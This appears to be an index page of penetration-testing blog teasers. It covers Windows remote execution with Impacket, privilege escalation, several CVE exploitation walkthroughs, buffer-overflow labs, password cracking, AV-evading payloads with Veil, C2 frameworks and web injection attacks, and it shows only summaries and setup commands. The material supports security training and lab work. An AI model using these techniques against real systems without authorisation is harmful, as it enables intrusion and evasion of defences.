Impacket Remote code execution (RCE) on Windows from Linux

Impacket is a collection of Python classes and functions for working with various Windows network protocols. It is a centerpiece of many different pentesting tools. Impacket can work with plain, NTLM and Kerberos authentications, fully supporting passing-the-hash (PTH) attacks and more. https://github.com/SecureAuthCorp/impacket Method Port Used psexec.py tcp/445 dcomexec.py tcp/135, tcp/445, Read more…

SMB server with Impaket-smbserver

This time we will set a SMB server to run script from using impaket-smbserver https://github.com/SecureAuthCorp/impacket Download 1. Download the scripts git clone https://github.com/SecureAuthCorp/impacket.git 2. locate the smbserver script find . -iname *smbserver* 2> /dev/null Note: I already have it installed in my Kali machine How to 1. In your Linux Read more…

Connect to Windows Remote Management (WinRM) using Evil WinRM

Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate. https://docs.microsoft.com/en-us/windows/win32/winrm/portal WinRM is a command-line tool that is used for the following tasks: Remotely communicate and interface with hosts Read more…

WinPEAS – Windows Enum

WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. This writing is about how to run it, and, complete Post-Exploitation activities How to 1. Download the script from GitHub (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git cd privilege-escalation-awesome-scripts-suite 2. Navigate through the directories to find the binary Read more…

Kerberos Service Principal Name (SPN) Lab

Having already set up Active directory as per (https://vk9-sec.com/active-directory-dns-lab/). We can set up the SPN service for testing purposes. To use Kerberos authentication requires both the following conditions to be true: The client and server computers must be part of the same Windows domain, or in trusted domains. A Service Read more…

Exploiting mRemoteNG

mRemoteNG (mremote) is an open source project (https://github.com/rmcardle/mRemoteNG) that provides a full-featured, multi-tab remote connections manager. It currently supports RDP, SSH, Telnet, VNC, ICA, HTTP/S, rlogin, and raw socket connections. Additionally, It also provides the means to save connection settings such as hostnames, IP addresses, protocol, port, and user credentials, Read more…

How to enumerate Windows using JAWS

JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so ‘should’ run on every Windows version since Windows 7. https://github.com/411Hall/JAWS How to 1. Download the script git clone https://github.com/411Hall/JAWS.git cd JAWS ls 2. Read more…

ColdFusion 8 FCKeditor CurrentFolder directory traversal / File Upload / RCE – CVE-2009-2265

Multiple vendor applications that utilize FCKeditor could allow a remote attacker to traverse directories on the system and upload arbitrary files. A remote attacker could exploit this vulnerability using directory traversal sequences in the CurrentFolder parameter to several connector modules to view arbitrary files or upload malicous executable files on Read more…

Drupal 7.x Module Services – Remote Code Execution

Drupal has an insecure use of unserialize(). The exploitation of the vulnerability allowed for privilege escalation, SQL injection and, finally, remote code execution. (https://www.ambionics.io/blog/drupal-services-module-rce) We will use Exploit db code to exploit this vulnerability. (https://www.exploit-db.com/exploits/41564) Exploit 1. Determine the version of drupal. For this we can access CHANGELOG.txt from the Read more…

Droopescan – How to use

A plugin-based scanner that aids security researchers in identifying issues with several CMS. (https://github.com/droope/droopescan) Supported CMS are: SilverStripe WordPress Drupal Partial functionality for: Joomla (version enumeration and interesting URLs only) Moodle (plugin & theme very limited, watch out) How to use 1. Download the application git clone https://github.com/droope/droopescan.git cd droopescan Read more…

Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation (MS16-032) - 2016-0099

Microsoft Windows could allow a local authenticated attacker to gain elevated privileges on the system, caused by improper sanitization of handles in memory by the Secondary Logon Service. By executing a specially-crafted program, an authenticated attacker could exploit this vulnerability to execute arbitrary code as an administrator and take control Read more…

Sherlock – Find missing Windows patches for Local Privilege Escalation

Sherlock is a Powershell script used to privilege escalation, quickly finding vulnerabilities in the system. (https://github.com/rasta-mouse/Sherlock) Currently looks for: MS10-015 : User Mode to Ring (KiTrap0D) MS10-092 : Task Scheduler MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow MS13-081 : TrackPopupMenuEx Win32k NULL Page MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference Read more…

WordPress Plugin: Plainview Activity Monitor – (Authenticated) Command Injection – CVE-2018-15877

Plainview Activity Monitor plugin for WordPress could allow a remote authenticated attacker to execute arbitrary commands on the system. By sending a specially-crafted request, an attacker could exploit this vulnerability using shell metacharacters in the ip parameter to inject and execute arbitrary OS commands on the system. The Plainview Activity Read more…

Linux Restricted Shell Bypass

Restricted shells are conceptually shells with restricted permissions, with features and commands working under a very peculiar environment, built to keep users in a secure and controlled environment, allowing them just the minimum necessary to perform their daily operations. Once hackers get a low privileged shell, even a restricted one, Read more…

Fcrackzip – BruteForce ZIP protected files

fcrackzip is a third-party tool for cracking zip files passwords. It tries to brute force using a list of passwords. Installation sudo apt install fcrackzip Before using fcrackzip we need a password protected zip file. zip –password <password><filename.zip> <data> zip –password vk9security new_file.zip data.txt How to use 1. Show help Read more…

BufferOverflow lab 3: Panel app (Linux)

This lab is intended to demonstrate how to exploit BoF in Linux. The vulnerable application is Panel which can be downloaded from a VulnHub machine (https://www.vulnhub.com/entry/pinkys-palace-v2,229/). The executable can be found at (https://github.com/vry4n/BoF-Panel-Linux) This application is a custom app that runs on port 31337 & it is vulnerable to Buffer Read more…

Ssh2john how to

Ssh2john is part of John The Reaper suite. This is a script that basically transforms [RSA/DSA/EC/OPENSSH (SSH private keys) ] private key to john format for later cracking using JtR How to 1. Having an RSA private key already cat id_rsa 2. locate the ssh2john script using find find / Read more…

How to use WPScan

WPScan is an open source WordPress security scanner. You can use it to scan your WordPress website for known vulnerabilities within the WordPress core, as well as popular WordPress plugins and themes. This tool is available at: https://github.com/wpscanteam/wpscan, this comes installed in most security distributions. How to use 1. Display Read more…

Chkrootkit 0.49 – Local Privilege Escalation – CVE-2014-0476

chkrootkit is a tool to locally check for signs of a rootkit (http://www.chkrootkit.org/). It contains: chkrootkit: a shell script that checks system binaries for rootkit modification. ifpromisc.c: checks if the network interface is in promiscuous mode. chklastlog.c: checks for lastlog deletions. chkwtmp.c: checks for wtmp deletions. check_wtmpx.c: checks for wtmpx Read more…

Exploiting pChart 2.1.3 (Directory traversal & XSS)

PHP library pChart 2.1.3 (and possibly previous versions) by default contains an examples folder, where the application is vulnerable to Directory Traversal and Cross-Site Scripting (XSS). This has been taken from (https://www.exploit-db.com/exploits/31173) Exploiting Directory Traversal 1. Visiting the application at (http://192.168.0.18/pChart2.1.3/examples/index.php), we get to the examples folder. 2. This tool Read more…

Installing Splunk (Linux)

Splunk is a software platform to search, analyze and visualize the machine-generated data gathered from the websites, applications, sensors, devices etc. which make up your IT infrastructure and business. Mainly Splunk does these things: Ingests Data Parses, indexes and stores data Runs searches on index data For more info visit: Read more…

Domain info using Robtex

Robtex is a service which gathers public information about IP addresses, domain names, host names, Autonomous systems, and more. How to use 1. Access https://www.robtex.com/dns-lookup and search for the domain 2. In the results we can find Analysis DNS servers Mail servers IP address Quick Info FQDN DNS servers Records Read more…

How to use whois

Information gathering is the first step of Ethical Hacking, where the penetration tester or even hackers gather information on their target victims. To increase your chances of a “successful” hacking, you will need to do a good job and spend time on this stage. There is a couple of information Read more…

BufferOverflow lab 2: MiniShare

This time we’ll exploit Minishare 1.4.1. This is a web application that runs on port 80 as HTTP, you can share files and the users can download them from the site. I uploaded the application to GitHub (https://github.com/vry4n/BoF-MiniShare-1.4.1) Lab details Windows XP x86 (192.168.0.5) Immunity debugger MiniShare 1.4.1 Kali (192.168.0.20) Read more…

BufferOverflow lab 1: FreeFloat FTP Server

This lab is intended to demonstrate how to exploit BoF in Windows. The vulnerable application is FreeFloat which can be downloaded from (https://www.exploit-db.com/apps/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip). The Freefloat FTP Server has many vulnerable parameters, which can be useful to practice on, and we will choose one of them here to do a full Read more…

How to use Veil to create payloads

 Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions. Installation 1. Run the commands below and wait for installation to complete sudo apt-get -y install git git clone https://github.com/Veil-Framework/Veil.git cd Veil/ ./config/setup.sh –force –silent 2. Upon completion. You can run the application with the command Read more…

Active Directory & DNS Lab

This time we will configure basic AD and DNS functionality. The terms object, organizational unit, domain, tree, and forest are used to describe the way Active Directory organizes its directory data. Like all directories, Active Directory is essentially a database management system. The Active Directory database is where the individual Read more…

How to Set up & Use C2 PoshC2

PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools, allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes Read more…

How to Set up & Use C2 Sliver

Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server. Sliver supports multiple callback protocols including DNS, TCP, and HTTP(S) Read more…

How to Set up & Use C2 Empire

Empire 3 is a post-exploitation framework that includes a pure-PowerShell Windows agent, and compatibility with Python 3.x Linux/OS X agents. It is the merger of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and flexible architecture. Documentation GitHub: https://github.com/BC-SECURITY/Empire Client: https://github.com/BC-SECURITY/Starkiller Installation Server 1. Download Read more…

How to Set up & Use C2 Silent Trinity

SILENTTRINITY is modern, asynchronous, multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. It’s the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET API’s, a technique the author coined as BYOI (Bring Your Own Interpreter). The aim Read more…

Hardening SMB

Server Message Block (SMB) is a networking file share protocol included in Windows workstation and Windows server that provides the ability to read and write files and perform other service requests to network devices on a share. Windows supports file and printer sharing traffic by using the Server Message Block Read more…

SMTP Injection attack

Mail Command Injection is an attack technique used to exploit mail servers and webmail applications that construct IMAP/SMTP statements from user-supplied input that is not properly sanitized. an attack technique that injects attacker-controlled SMTP commands into the data transmitted from an application (typically a web application) to an SMTP server Read more…

How to set up bWAPP – Linux

bWAPP, or a buggy web application, is a deliberately insecure web application. bWAPP helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. bWAPP is a PHP application that uses a MySQL database. It can be hosted on Linux and Windows. https://github.com/jehy-security/bwapp https://sourceforge.net/projects/bwapp/ Installation 1. Download the Read more…

Server-side HTTP Redirection

Server-side redirection vulnerabilities arise when an application takes user controllable input and incorporates it into a URL that it retrieves using a backend HTTP request. Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a Read more…

Cracking Password John The Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix, macOS, Windows, DOS, BeOS, and OpenVMS (the latter requires a contributed patch). Its primary purpose is to detect weak passwords. It is one of the most popular password testing and breaking programs as it combines Read more…

Basics of Path Traversal

Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files. In some cases, an attacker Read more…

Basic Command injection

Command injection is one of the top 10 OWASP vulnerability. it’s an attack in which arbitrary commands of a host OS are executed through a vulnerable application. The attack is possible when a web application sends unsafe user data to the system shell function within the running script. This user Read more…

How to set up Mutillidae – Linux

Mutillidae is a vulnerable framework where you can practice OWASP top 10, https://owasp.org/www-project-top-ten/ Download https://sourceforge.net/projects/mutillidae/ sudo git clone https://github.com/webpwnized/mutillidae.git 1. Install the required repositories (in this case I’m using php 7.3) sudo apt-get install php7.3-curl php7.3-mbstring php7.3-xml Extra Show php version php –version 2. Extract the Mutillidae content in /var/www/html Read more…

Introduction – Hacking with BeEF

BeEF utilizes YAML files in order to configure the core functionality, as well as the extensions. Most of the core BeEF configurations are in the main configuration file: config.yaml, found in the BeEF directory. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses Read more…

Hiding public IP – Anonsurf

Anonsurf uses TOR iptables to anonymize the whole system. Anonsurf gives users the capability of starting or stopping the I2P project. https://github.com/Und3rf10w/kali-anonsurf Installation 1. Download the file from github git clone https://github.com/Und3rf10w/kali-anonsurf.git 2. Run installer located in the download folder kali-anonsurf sudo bash installer.sh 3. Run the application after successful Read more…

Blind SQL injection

Blind SQL injection arises when an application is vulnerable to SQL injection, but its HTTP responses do not contain the results of the relevant SQL query or the details of any database errors. With blind SQL injection vulnerabilities, many techniques such as UNION attacks are not effective, because they rely Read more…

SMTP lab (hMailServer)

This has been writen to explain the steps to set a basic insecure SMTP lab. We are using hMailServer to act as a mail server & Thunderbird as mail client. https://www.hmailserver.com/ https://www.thunderbird.net/ Mail Server (hMailServer) 1. Start the wizzard 2. Next, Accept the license 3. Select the install folder, next Read more…